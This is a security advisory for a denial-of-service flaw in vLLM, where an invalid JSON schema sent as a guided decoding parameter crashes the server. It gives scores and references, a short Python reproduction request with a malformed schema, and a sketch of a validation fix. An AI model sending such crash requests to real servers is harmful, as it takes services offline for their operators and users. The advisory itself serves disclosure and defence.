
CVE-2025-48942: vLLM DoS: Remotely kill vLLM over HTTP with invalid JSON schema

6.5 CVSS

Description

vLLM is an inference and serving engine for large language models (LLMs). In versions 0.8.0 up to but excluding 0.9.0, sending a request to the /v1/completions API with an invalid json_schema as a guided decoding parameter crashes the vLLM server. This vulnerability is similar to GHSA-9hcf-v7m4-6m2j/CVE-2025-48943, which describes the same issue for a regex guided parameter rather than a JSON schema. Version 0.9.0 fixes the issue.
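
For illustration, a minimal reproduction sketch (not taken from the advisory) is shown below. It assumes a local vLLM OpenAI-compatible server on port 8000; the model name and the specific invalid schema are placeholders, and guided_json is vLLM's extra parameter for JSON-schema guided decoding.

# Hypothetical reproduction sketch: one /v1/completions request carrying a
# malformed JSON schema via the guided_json parameter. On affected versions
# (>= 0.8.0, < 0.9.0) the schema fails to compile and the resulting uncaught
# exception can bring down the server process.
import requests

VLLM_URL = "http://localhost:8000/v1/completions"  # assumed local deployment

payload = {
    "model": "placeholder-model",          # replace with the served model name
    "prompt": "Return a JSON object.",
    "max_tokens": 16,
    # Invalid JSON schema: "type" is not a recognized JSON Schema type, so
    # guided-decoding schema compilation raises an exception.
    "guided_json": {"type": "not-a-real-type"},
}

resp = requests.post(VLLM_URL, json=payload, timeout=30)
print(resp.status_code, resp.text[:200])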

Classification

CVE ID: CVE-2025-48942

CVSS Base Severity: MEDIUM

CVSS Base Score: 6.5

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Problem Types

CWE-248: Uncaught Exception
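
CWE-248 means an exception raised while handling untrusted input is never caught, so a single malformed request can terminate the whole serving process instead of being rejected with an error response. The sketch below illustrates the general mitigation pattern only, with assumed handler and field names; it is not vLLM's actual patch. It validates the untrusted schema up front with the jsonschema library and converts failures into an HTTP 400.

# Illustrative handler-level guard for CWE-248 (not vLLM's actual fix):
# check the client-supplied schema before it reaches the guided-decoding
# backend and turn failures into a client error rather than an unhandled
# exception that kills the process.
import jsonschema
from fastapi import FastAPI, HTTPException

app = FastAPI()

@app.post("/v1/completions")
async def completions(request: dict):
    schema = request.get("guided_json")
    if schema is not None:
        try:
            # Raises jsonschema.SchemaError if the schema itself is invalid.
            jsonschema.Draft202012Validator.check_schema(schema)
        except jsonschema.SchemaError as exc:
            raise HTTPException(status_code=400,
                                detail=f"invalid guided_json schema: {exc}")
    # ... hand the validated request off to the inference engine here ...
    return {"choices": []}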

Affected Products

Vendor: vllm-project

Product: vllm

Exploit Prediction Scoring System (EPSS)

EPSS Score: 0.05% (estimated probability of exploitation in the wild within the next 30 days)

EPSS Percentile: 14.01% (proportion of scored vulnerabilities with an EPSS score at or below this one)

EPSS Date: 2025-06-18 (date the score was calculated)

References

https://nvd.nist.gov/vuln/detail/CVE-2025-48942
https://github.com/vllm-project/vllm/security/advisories/GHSA-6qc9-v4r8-22xg
https://github.com/vllm-project/vllm/issues/17248
https://github.com/vllm-project/vllm/pull/17623
https://github.com/vllm-project/vllm/commit/08bf7840780980c7568c573c70a6a8db94fd45ff
